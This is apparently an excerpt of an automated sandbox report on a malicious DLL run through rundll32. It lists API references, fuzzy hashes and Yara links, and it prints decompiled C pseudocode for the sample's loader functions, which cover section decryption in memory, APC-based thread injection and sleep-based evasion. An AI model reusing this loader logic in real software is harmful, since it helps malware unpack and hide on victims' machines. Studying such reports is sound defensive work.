std::_Lockit::_Lockit.LIBCPMT ref: 6D480961
std::_Facet_Register.LIBCPMT ref: 6D4809B2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4809D2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4809F0

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction ID: 79edab8c93175075049ccbc22e27aaddad4a8d8bf4e9fd0dc66c7a30cde1445d
Opcode Fuzzy Hash: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction Fuzzy Hash: E011AC72805129CBCF15DFA5C854EEE7775AF85358F26040DE614AB290DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B9F2, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BA03
std::_Facet_Register.LIBCPMT ref: 6D47BA54
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BA74
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BA92

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction ID: 138878d2f34deaac6d5ac750ce45965dff2197b52e02461f7c5820766d997cd0
Opcode Fuzzy Hash: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction Fuzzy Hash: 0F119A36C082298BCF25DBA4C884EEE77B5AF85324F26040DD615AB290DF349E05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481072, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481083
std::_Facet_Register.LIBCPMT ref: 6D4810D4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4810F4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D481112

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction ID: 97326177e85ec5436a9785dfc038d60680295897353fa403b150e812f36207e0
Opcode Fuzzy Hash: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction Fuzzy Hash: 1B11A0329041698BCF15DB65C840EEE7775AF85358F26440EE611AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480804, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480815
std::_Facet_Register.LIBCPMT ref: 6D480866
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480886
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4808A4

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction ID: 501574e1bb70185e12b83917f32164f2108c4853dd2509aec750a55c50116b95
Opcode Fuzzy Hash: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction Fuzzy Hash: 7311EC32C042298BCF19DFA1D844EEE7B75AF85394F26040DE610AB290DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4808AA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4808BB
std::_Facet_Register.LIBCPMT ref: 6D48090C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48092C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48094A

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction ID: b549fafeacd3f6e5dae217e54e72226aeb4e8f047809c4f45a83c76aeb2e0ffc
Opcode Fuzzy Hash: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction Fuzzy Hash: 5011AC3280412A8BCF15DFA6C840EEE77B5AF85364F26040DD610AB2A1DF74EE01DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BA98, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BAA9
std::_Facet_Register.LIBCPMT ref: 6D47BAFA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BB1A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BB38

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction ID: edf9d1510de5de9a4b89afd188f08ec27bcbe927fa6e0934a101447e8da26bcd
Opcode Fuzzy Hash: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction Fuzzy Hash: 88119A729042298BCF25DBA5C844EEE7775AF85328F26440DDA10AB390DF749E01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C45E6, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58), ref: 6D4C4618
GetLastError.KERNEL32(?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000,00000364,?,6D4BDF29), ref: 6D4C4624
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000), ref: 6D4C4632

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction ID: bd82ea86bdca110e910f3701ce1c0883a881a8a9b646d3c04cbb85fb896ebdc8
Opcode Fuzzy Hash: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction Fuzzy Hash: D501D43A755223ABCF114E7DCE44E567BA8AB0ABF17260225F919D3244DB24EC01CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7C1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4B7CAD

Strings

pow, xrefs: 6D4B7C85, 6D4B7CA2

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction ID: 771380e0f8fc9e27472e3a77cf89ef2e8e80128af332eeb17585f8d318386dda
Opcode Fuzzy Hash: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction Fuzzy Hash: 42514765E1C703A7CB02BB24C990F7A3BB4AB51741F31C95CE0A542398EB358C959E97

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD324, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D4CD5C5,?,00000050,?,?,?,?,?), ref: 6D4CD3FF

Strings

OCP, xrefs: 6D4CD378
ACP, xrefs: 6D4CD342

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction ID: ee540e570f7a97e85225db797f073506710b60ffbbefc2c32ddc35384966cf5b
Opcode Fuzzy Hash: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction Fuzzy Hash: B121C46A694106A6E714DE58CD00FDB73AAFBC5B50F678464EA09D7310F732ED01C356

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C22D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C2348

Strings

DTm, xrefs: 6D4C2303
HTm, xrefs: 6D4C2315

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free
String ID: DTm$HTm
API String ID: 269201875-2435632002
Opcode ID: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction ID: af1f8f997447600e55b5ebc96017d885417481b4998f513798888fbb771f9472
Opcode Fuzzy Hash: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction Fuzzy Hash: 2D11B4791083029FE770CF3DD480F5677E8EB167A8B30942EE5998B651DBB19C4187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5F71, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 6D4C6007
GetLastError.KERNEL32 ref: 6D4C6015
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6D4C6070

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction ID: 61d72aef1f7ea1925916033413172f8c401f68437eba1a38f4e8ca5d94da0ca8
Opcode Fuzzy Hash: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction Fuzzy Hash: 0B41E739604216AFDB11CF6AC844F7A7BB5EF03314F21C25DE958672A1DB318D42C7A2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6476 Parent PID: 6456 rundll32.exeCOMMON

Executed Functions

Function 6D541746, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000727,00003000,00000040,00000727,6D5411A0), ref: 6D541803
VirtualAlloc.KERNEL32(00000000,00000269,00003000,00000040,6D5411FF), ref: 6D54183A
VirtualAlloc.KERNEL32(00000000,0000FDA6,00003000,00000040), ref: 6D54189A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D5418D0
VirtualProtect.KERNEL32(6D450000,00000000,00000004,6D541725), ref: 6D5419D5
VirtualProtect.KERNEL32(6D450000,00001000,00000004,6D541725), ref: 6D5419FC
VirtualProtect.KERNEL32(00000000,?,00000002,6D541725), ref: 6D541AC9
VirtualProtect.KERNEL32(00000000,?,00000002,6D541725,?), ref: 6D541B1F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D541B3B

Memory Dump Source

Source File: 00000003.00000002.902050395.000000006D541000.00000040.00020000.sdmp, Offset: 6D541000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 51fdc63658de21ca3e7fc03ac4ccf3f5394230b99318a8f87d8b36649fad153b
Instruction ID: f7a2219c029a6e30627772013bc5bffe79b596495374d6d89080f693d5f975b7
Opcode Fuzzy Hash: 51fdc63658de21ca3e7fc03ac4ccf3f5394230b99318a8f87d8b36649fad153b
Instruction Fuzzy Hash: 75D17DB2600241AFDB25CF54C880F5177B6FF88310B198696ED499FA9AD77CBC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D45163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6D45163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6D451850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6D4518F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6D4512DC(E6D45135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6D451538(_t44,  &_a4) != 0) {
					 *0x6d454138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t48 =  *_t55(_t43, 0, 0);
				if(_t48 == 0) {
					L9:
					 *0x6d454138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6D451DE1(_t48 + _t14);
				 *0x6d454138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48);
				E6D451DFC(_t43);
				goto L11;
			}

APIs

Part of subcall function 6D451850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D45164B,73B763F0), ref: 6D45185F
Part of subcall function 6D451850: GetVersion.KERNEL32 ref: 6D45186E
Part of subcall function 6D451850: GetCurrentProcessId.KERNEL32 ref: 6D451885
Part of subcall function 6D451850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D45189E

GetSystemTime.KERNEL32(?,00000000,73B763F0), ref: 6D45165D
SwitchToThread.KERNEL32 ref: 6D451663

Part of subcall function 6D4518F4: VirtualAlloc.KERNELBASE(00000000,6D45167D,00003000,00000004,?,?,6D45167D,00000000), ref: 6D45194A
Part of subcall function 6D4518F4: memcpy.NTDLL(?,?,6D45167D,?,?,6D45167D,00000000), ref: 6D4519DC
Part of subcall function 6D4518F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6D45167D,00000000), ref: 6D4519F7

Sleep.KERNELBASE(00000000,00000000), ref: 6D451684
GetLongPathNameW.KERNEL32 ref: 6D4516B9
GetLongPathNameW.KERNEL32 ref: 6D4516D7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6D45170F
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D451721
CloseHandle.KERNEL32(00000000), ref: 6D451728
GetLastError.KERNEL32(?,00000000), ref: 6D451730
GetLastError.KERNEL32 ref: 6D45173D

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: db5d8e3cad159647c32c1dcb7c448bcf68237a01590059412e953c12c9b9bc6f
Instruction ID: 645f73bcaa7fcf7d76b7625dd5c70977d8747f86038507f19c369625ded2afc6
Opcode Fuzzy Hash: db5d8e3cad159647c32c1dcb7c448bcf68237a01590059412e953c12c9b9bc6f
Instruction Fuzzy Hash: 4E318671900216ABCF10EFA98C88FAF77BDEF45750B254226E915D7240E734DE20CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D451AFA, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d454108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d45410c;
						if( *0x6d45410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d454118;
								if( *0x6d454118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d45410c);
						}
						HeapDestroy( *0x6d454110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d454108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6d454110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d454130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D4512DC(E6D45111A, E6D4515EE(_a12, 1, 0x6d454118, _t41));
							 *0x6d45410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6D454108), ref: 6D451B1C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D451B31

Part of subcall function 6D4512DC: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D454118,6D451B6A), ref: 6D4512F3
Part of subcall function 6D4512DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D451308
Part of subcall function 6D4512DC: GetLastError.KERNEL32(00000000), ref: 6D451313
Part of subcall function 6D4512DC: TerminateThread.KERNEL32(00000000,00000000), ref: 6D45131D
Part of subcall function 6D4512DC: CloseHandle.KERNEL32(00000000), ref: 6D451324
Part of subcall function 6D4512DC: SetLastError.KERNEL32(00000000), ref: 6D45132D

InterlockedDecrement.KERNEL32(6D454108), ref: 6D451B84
SleepEx.KERNEL32(00000064,00000001), ref: 6D451B9E
CloseHandle.KERNEL32 ref: 6D451BBA
HeapDestroy.KERNEL32 ref: 6D451BC6

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 30b72d9a6d3af2cc741b7c43902e96941a73911a4cf1b6e776ea94bdc4ab21fc
Instruction ID: addabae2917a3518b9afef1f6a8c6323e6e4665ecc0981343644e6b6cd927df7
Opcode Fuzzy Hash: 30b72d9a6d3af2cc741b7c43902e96941a73911a4cf1b6e776ea94bdc4ab21fc
Instruction Fuzzy Hash: A8215E75600246ABDF00AF69C888F6A7BF4FB6A7A47214529F519D7241E734CD208B50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4512DC, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4512DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d45414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d4512f3
0x6d4512f9
0x6d4512fd
0x6d451308
0x6d451310
0x6d451319
0x6d45131d
0x6d451324
0x6d45132b
0x6d45132d
0x6d451333
0x6d451310
0x6d451337

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D454118,6D451B6A), ref: 6D4512F3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D451308
GetLastError.KERNEL32(00000000), ref: 6D451313
TerminateThread.KERNEL32(00000000,00000000), ref: 6D45131D
CloseHandle.KERNEL32(00000000), ref: 6D451324
SetLastError.KERNEL32(00000000), ref: 6D45132D

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 2a497b95c8e2619a7315858a93bc0e9a80a0d644fd39fc7cb9781f589e9a0f03
Instruction ID: cd61cb231e81aa8d131fce3b95e014e89f27d768910a457b0f28cb6615435925
Opcode Fuzzy Hash: 2a497b95c8e2619a7315858a93bc0e9a80a0d644fd39fc7cb9781f589e9a0f03
Instruction Fuzzy Hash: 76F0F832205721FBDB12AFA08C4CF9FBB79FB0AB61F114604FA0595154D731CC209BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDEDB, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4B41FE,6D4BF5DE,?,6D4BDE85,00000001,00000364,?,?,6D4B42CA,?,?,6D47A5FA), ref: 6D4BDEE0
_free.LIBCMT ref: 6D4BDF15
_free.LIBCMT ref: 6D4BDF3C
SetLastError.KERNEL32(00000000), ref: 6D4BDF49
SetLastError.KERNEL32(00000000), ref: 6D4BDF52

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction ID: c231fee8f303f25c348a00c1e1bc0176ea73fec657a03491ce655016503f57b7
Opcode Fuzzy Hash: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction Fuzzy Hash: 6001493E10C60126DE0286394C84F1A2E79ABE63BAB33416DF60E93381FF31CC0181B5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4518F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D4518F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d454130;
				_t39 = E6D451F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d45414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d4551a7; // 0x6d4551a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D4518C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d45414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,6D45167D,00003000,00000004,?,?,6D45167D,00000000), ref: 6D45194A
memcpy.NTDLL(?,?,6D45167D,?,?,6D45167D,00000000), ref: 6D4519DC
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6D45167D,00000000), ref: 6D4519F7

Strings

Mar 9 2021, xrefs: 6D45197C

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 9 2021
API String ID: 4010158826-2159264323
Opcode ID: 0a2866caed10b318e8e414a172e1bc8af9239ceed74b46b1447b2e88b978bdcd
Instruction ID: 415ad9aca943c47ab64d5a1ef2cd4302a03a190767f53ef02fa9cf659d7dcad8
Opcode Fuzzy Hash: 0a2866caed10b318e8e414a172e1bc8af9239ceed74b46b1447b2e88b978bdcd
Instruction Fuzzy Hash: ED315375E0021A9FDF01DF99C880FAEBBB5BF4A704F108168D504BB244D771AE15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D45111A, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D45111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D45163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d451123
0x6d451128
0x6d451136
0x6d45113b
0x6d45113b
0x6d451141
0x6d451146
0x6d45114a
0x6d45114e
0x6d45114e
0x6d451158
0x6d451161

APIs

GetCurrentThread.KERNEL32 ref: 6D45111D
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D451128
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D45113B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D45114E

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
